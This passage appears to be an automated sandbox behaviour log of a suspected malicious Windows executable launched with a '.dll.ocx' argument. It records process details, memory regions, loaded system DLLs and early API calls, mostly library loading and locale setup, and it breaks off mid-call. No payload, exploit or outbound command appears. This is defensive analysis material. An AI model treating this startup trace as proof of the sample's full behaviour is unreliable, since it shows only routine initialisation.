# Flog Txt Version 1 # Analyzer Version: 4.6.0 # Analyzer Build Date: Jul 8 2022 06:26:21 # Log Creation Date: 09.10.2022 21:21:58.334 Process: id = "1" image_name = "lnmfxzvh.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\lnmfxzvh.exe" page_root = "0x48eed000" os_pid = "0xce4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x7fc" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\LNMfxzVh.exe\" \"C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 117 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 118 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 119 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 120 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 121 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 122 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 123 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 124 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 125 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 126 start_va = 0x7ff7a5e90000 end_va = 0x7ff7a5eb1fff monitored = 1 entry_point = 0x7ff7a5e916cc region_type = mapped_file name = "lnmfxzvh.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\LNMfxzVh.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\lnmfxzvh.exe") Region: id = 127 start_va = 0x7ffe97fe0000 end_va = 0x7ffe981a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 266 start_va = 0x400000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 267 start_va = 0x7ffe954a0000 end_va = 0x7ffe9554cfff monitored = 0 entry_point = 0x7ffe954b81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 268 start_va = 0x7ffe94740000 end_va = 0x7ffe94927fff monitored = 0 entry_point = 0x7ffe9476ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 269 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 270 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 271 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 272 start_va = 0x510000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 273 start_va = 0x7ffe92470000 end_va = 0x7ffe924e8fff monitored = 0 entry_point = 0x7ffe9248fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 274 start_va = 0x7ff5ffe50000 end_va = 0x7ff5ffecdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 275 start_va = 0x7ffe95670000 end_va = 0x7ffe957c5fff monitored = 0 entry_point = 0x7ffe9567a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 276 start_va = 0x7ffe957d0000 end_va = 0x7ffe95955fff monitored = 0 entry_point = 0x7ffe9581ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 277 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 278 start_va = 0x7ffe97600000 end_va = 0x7ffe976a6fff monitored = 0 entry_point = 0x7ffe976158d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 279 start_va = 0x7ffe97f40000 end_va = 0x7ffe97fdcfff monitored = 0 entry_point = 0x7ffe97f478a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 280 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 281 start_va = 0x7ffe97590000 end_va = 0x7ffe975eafff monitored = 0 entry_point = 0x7ffe975a38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 282 start_va = 0x7ffe95550000 end_va = 0x7ffe9566bfff monitored = 0 entry_point = 0x7ffe955902b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 283 start_va = 0x7ffe95e70000 end_va = 0x7ffe973cefff monitored = 0 entry_point = 0x7ffe95fd11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 284 start_va = 0x7ffe95390000 end_va = 0x7ffe953d2fff monitored = 0 entry_point = 0x7ffe953a4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 285 start_va = 0x7ffe94a80000 end_va = 0x7ffe950c3fff monitored = 0 entry_point = 0x7ffe94c464b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 286 start_va = 0x7ffe95960000 end_va = 0x7ffe95bdcfff monitored = 0 entry_point = 0x7ffe95a34970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 287 start_va = 0x7ffe950f0000 end_va = 0x7ffe95159fff monitored = 0 entry_point = 0x7ffe95126d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 288 start_va = 0x7ffe95df0000 end_va = 0x7ffe95e41fff monitored = 0 entry_point = 0x7ffe95dff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 289 start_va = 0x7ffe94680000 end_va = 0x7ffe9468efff monitored = 0 entry_point = 0x7ffe94683210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 290 start_va = 0x7ffe949c0000 end_va = 0x7ffe94a74fff monitored = 0 entry_point = 0x7ffe94a022e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 291 start_va = 0x7ffe94600000 end_va = 0x7ffe9464afff monitored = 0 entry_point = 0x7ffe946035f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 292 start_va = 0x7ffe94660000 end_va = 0x7ffe94673fff monitored = 0 entry_point = 0x7ffe946652e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 293 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 294 start_va = 0x710000 end_va = 0x897fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 295 start_va = 0x7ffe97c00000 end_va = 0x7ffe97c3afff monitored = 0 entry_point = 0x7ffe97c012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 296 start_va = 0x8a0000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 297 start_va = 0xa30000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 298 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 299 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 300 start_va = 0x1a0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 301 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 302 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 303 start_va = 0x1e30000 end_va = 0x2166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 304 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 305 start_va = 0x2170000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 306 start_va = 0x7ffe97df0000 end_va = 0x7ffe97f32fff monitored = 0 entry_point = 0x7ffe97e18210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 307 start_va = 0x2270000 end_va = 0x232ffff monitored = 0 entry_point = 0x2290da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 308 start_va = 0x2270000 end_va = 0x234cfff monitored = 0 entry_point = 0x22ce0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 309 start_va = 0x7ffe92f80000 end_va = 0x7ffe93015fff monitored = 0 entry_point = 0x7ffe92fa5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 310 start_va = 0x2270000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 311 start_va = 0x7ffe92c00000 end_va = 0x7ffe92d85fff monitored = 0 entry_point = 0x7ffe92c4d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 312 start_va = 0x7ffe95d20000 end_va = 0x7ffe95de0fff monitored = 0 entry_point = 0x7ffe95d40da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 313 start_va = 0x2270000 end_va = 0x234cfff monitored = 0 entry_point = 0x22ce0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 314 start_va = 0x2390000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 315 start_va = 0x2270000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 316 start_va = 0x23a0000 end_va = 0x249ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 317 start_va = 0x24a0000 end_va = 0x259ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 318 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 319 start_va = 0x7ffe953e0000 end_va = 0x7ffe95486fff monitored = 0 entry_point = 0x7ffe953eb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 320 start_va = 0x7ffe926a0000 end_va = 0x7ffe92b32fff monitored = 0 entry_point = 0x7ffe926af760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 321 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 322 start_va = 0x25a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 323 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 324 start_va = 0x4c0000 end_va = 0x504fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 325 start_va = 0x26a0000 end_va = 0x279ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 326 start_va = 0x2370000 end_va = 0x2373fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 327 start_va = 0x27a0000 end_va = 0x282dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 328 start_va = 0x2830000 end_va = 0x2840fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 329 start_va = 0x2380000 end_va = 0x2383fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 330 start_va = 0x2850000 end_va = 0x286afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000018.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db") Region: id = 331 start_va = 0x2870000 end_va = 0x2870fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002870000" filename = "" Region: id = 332 start_va = 0x7ffe8ac40000 end_va = 0x7ffe8adf7fff monitored = 0 entry_point = 0x7ffe8acae630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 333 start_va = 0x7ffe8eb60000 end_va = 0x7ffe8eee1fff monitored = 0 entry_point = 0x7ffe8ebb1220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 334 start_va = 0x7ffe94280000 end_va = 0x7ffe942acfff monitored = 0 entry_point = 0x7ffe94299d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 335 start_va = 0x2380000 end_va = 0x2380fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002380000" filename = "" Region: id = 336 start_va = 0x7ff5ffe50000 end_va = 0x7ff5ffecdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 349 start_va = 0x7ffe8dc70000 end_va = 0x7ffe8dc7ffff monitored = 0 entry_point = 0x7ffe8dc73d50 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 350 start_va = 0x7ffe8cc50000 end_va = 0x7ffe8cc6afff monitored = 0 entry_point = 0x7ffe8cc51040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Thread: id = 1 os_tid = 0xce0 [0072.559] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffe94740000 [0072.559] GetProcAddress (hModule=0x7ffe94740000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffe94797c50 [0072.559] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffe94740000 [0072.559] GetProcAddress (hModule=0x7ffe94740000, lpProcName="FlsAlloc") returned 0x7ffe947a7e50 [0072.559] GetProcAddress (hModule=0x7ffe94740000, lpProcName="FlsSetValue") returned 0x7ffe94793cb0 [0072.560] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffe94740000 [0072.561] GetProcAddress (hModule=0x7ffe94740000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffe94797c50 [0072.561] GetProcessHeap () returned 0x510000 [0072.561] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffe94740000 [0072.561] GetProcAddress (hModule=0x7ffe94740000, lpProcName="FlsAlloc") returned 0x7ffe947a7e50 [0072.561] GetLastError () returned 0x0 [0072.561] GetProcAddress (hModule=0x7ffe94740000, lpProcName="FlsGetValue") returned 0x7ffe94783780 [0072.561] GetProcAddress (hModule=0x7ffe94740000, lpProcName="FlsSetValue") returned 0x7ffe94793cb0 [0072.561] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x3c8) returned 0x520300 [0072.562] SetLastError (dwErrCode=0x0) [0072.562] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1200) returned 0x526f20 [0072.563] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\LNMfxzVh.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0072.563] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0072.563] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0072.563] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0072.563] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\LNMfxzVh.exe\" \"C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx\"" [0072.563] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\LNMfxzVh.exe\" \"C:\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx\"" [0072.563] GetACP () returned 0x4e4 [0072.563] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x228) returned 0x51f830 [0072.563] IsValidCodePage (CodePage=0x4e4) returned 1 [0072.563] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0072.563] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0072.563] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0072.563] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0072.563] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0072.564] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0072.564] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0072.564] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffe94740000 [0072.564] GetProcAddress (hModule=0x7ffe94740000, lpProcName="LCMapStringEx") returned 0x7ffe94755350 [0072.564] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0072.564] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" 